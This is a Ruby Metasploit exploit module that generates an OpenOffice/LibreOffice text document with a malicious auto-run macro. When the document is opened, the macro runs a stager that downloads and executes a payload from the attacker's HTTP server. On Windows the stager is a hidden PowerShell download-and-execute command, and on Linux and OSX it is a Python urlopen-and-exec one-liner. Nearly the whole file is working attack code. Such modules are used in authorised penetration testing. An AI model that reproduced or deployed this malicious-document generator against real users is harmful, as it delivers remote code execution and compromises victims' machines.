213 lines
5.4 KiB
Ruby
213 lines
5.4 KiB
Ruby
##
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# This module requires Metasploit: https://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'rex/zip'
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require 'cgi'
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class MetasploitModule < Msf::Exploit::Remote
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Rank = ExcellentRanking
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include Msf::Exploit::FILEFORMAT
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include Msf::Exploit::Powershell
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include Msf::Exploit::Remote::HttpServer
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WINDOWSGUI = 'windows'
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OSXGUI = 'osx'
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LINUXGUI = 'linux'
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def initialize(info={})
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super(update_info(info,
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'Name' => "Apache OpenOffice Text Document Malicious Macro Execution",
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'Description' => %q{
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This module generates an Apache OpenOffice Text Document with a malicious macro in it.
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To exploit successfully, the targeted user must adjust the security level in Macro
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Security to either Medium or Low. If set to Medium, a prompt is presented to the user
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to enable or disable the macro. If set to Low, the macro can automatically run without
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any warning.
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The module also works against LibreOffice.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'sinn3r' # Metasploit
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],
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'References' =>
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[
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['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
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],
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'DefaultOptions' =>
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{
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'EXITFUNC' => 'thread',
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'DisablePayloadHandler' => false
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},
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'Targets' =>
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[
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[
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'Apache OpenOffice on Windows (PSH)', {
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'Platform' => 'win',
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'Arch' => [ARCH_X86, ARCH_X64]
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}],
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[
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'Apache OpenOffice on Linux/OSX (Python)', {
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'Platform' => 'python',
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'Arch' => ARCH_PYTHON
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}]
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],
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'Privileged' => false,
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'DisclosureDate' => '2017-02-08'
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))
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register_options([
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OptString.new("BODY", [false, 'The message for the document body', '']),
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OptString.new('FILENAME', [true, 'The OpenOffice Text document name', 'msf.odt'])
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])
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end
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def on_request_uri(cli, req)
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print_status("Sending payload")
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if target.name =~ /PSH/
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p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
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else
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p = payload.encoded
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end
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send_response(cli, p, 'Content-Type' => 'application/octet-stream')
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end
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def primer
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print_status("Generating our odt file for #{target.name}...")
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path = File.join(Msf::Config.install_root, 'data', 'exploits', 'openoffice_document_macro')
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docm = package_odt(path)
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file_create(docm)
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end
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def get_windows_stager
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%Q|Shell("cmd.exe /C ""#{generate_psh_stager}""")|
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end
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def get_unix_stager
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%Q|Shell("#{generate_python_stager}")|
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end
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def generate_psh_stager
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@windows_psh_stager ||= lambda {
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ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
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download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)
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download_and_run = "#{ignore_cert}#{download_string}"
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generate_psh_command_line(
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noprofile: true,
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windowstyle: 'hidden',
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command: download_and_run)
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}.call
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end
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def generate_python_stager
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@python_stager ||= lambda {
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%Q|python -c ""import urllib2; r = urllib2.urlopen('#{get_uri}'); exec(r.read());""|
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}.call
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end
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def get_statger
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case target.name
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when /PSH/
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get_windows_stager
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when /Python/
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get_unix_stager
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end
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end
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# This macro code has the following in mind:
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# 1. It checks the platform to eliminate less misfires. Since we have only tested on Windows/Linux/OSX,
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# we only want to fire at those.
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# 2. Originally, I tried to embed the payload in the macro code, write it out and then execute it.
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# This turned out to be problematic, because for some reason OpenOffice is not able to
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# write a large string to a file (I've tried either shell("echo") or using the macro API).
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# The stager code is similar to web_delivery.
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def macro_code
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CGI.escapeHTML(%Q|
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Sub OnLoad
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Dim os as string
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os = GetOS
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If os = "#{WINDOWSGUI}" OR os = "#{OSXGUI}" OR os = "#{LINUXGUI}" Then
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Exploit
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end If
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End Sub
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Sub Exploit
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#{get_statger}
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End Sub
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Function GetOS() as string
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select case getGUIType
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case 1:
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GetOS = "#{WINDOWSGUI}"
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case 3:
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GetOS = "#{OSXGUI}"
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case 4:
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GetOS = "#{LINUXGUI}"
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end select
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End Function
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Function GetExtName() as string
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select case GetOS
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case "#{WINDOWSGUI}"
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GetFileName = "exe"
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case else
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GetFileName = "bin"
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end select
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End Function
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|)
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end
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def on_file_read(short_fname, full_fname)
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buf = File.read(full_fname)
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case short_fname
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when /content\.xml/
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buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
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when /Module1\.xml/
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buf.gsub!(/CODEGOESHERE/, macro_code)
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end
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yield short_fname, buf
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end
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def package_odt(path)
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zip = Rex::Zip::Archive.new
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Dir["#{path}/**/**"].each do |file|
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p = file.sub(path+'/','')
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if File.directory?(file)
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print_status("Packaging directory: #{file}")
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zip.add_file(p)
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else
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on_file_read(p, file) do |fname, buf|
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print_status("Packaging file: #{fname}")
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zip.add_file(fname, buf)
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end
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end
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end
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zip.pack
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end
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def exploit
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super
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end
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end
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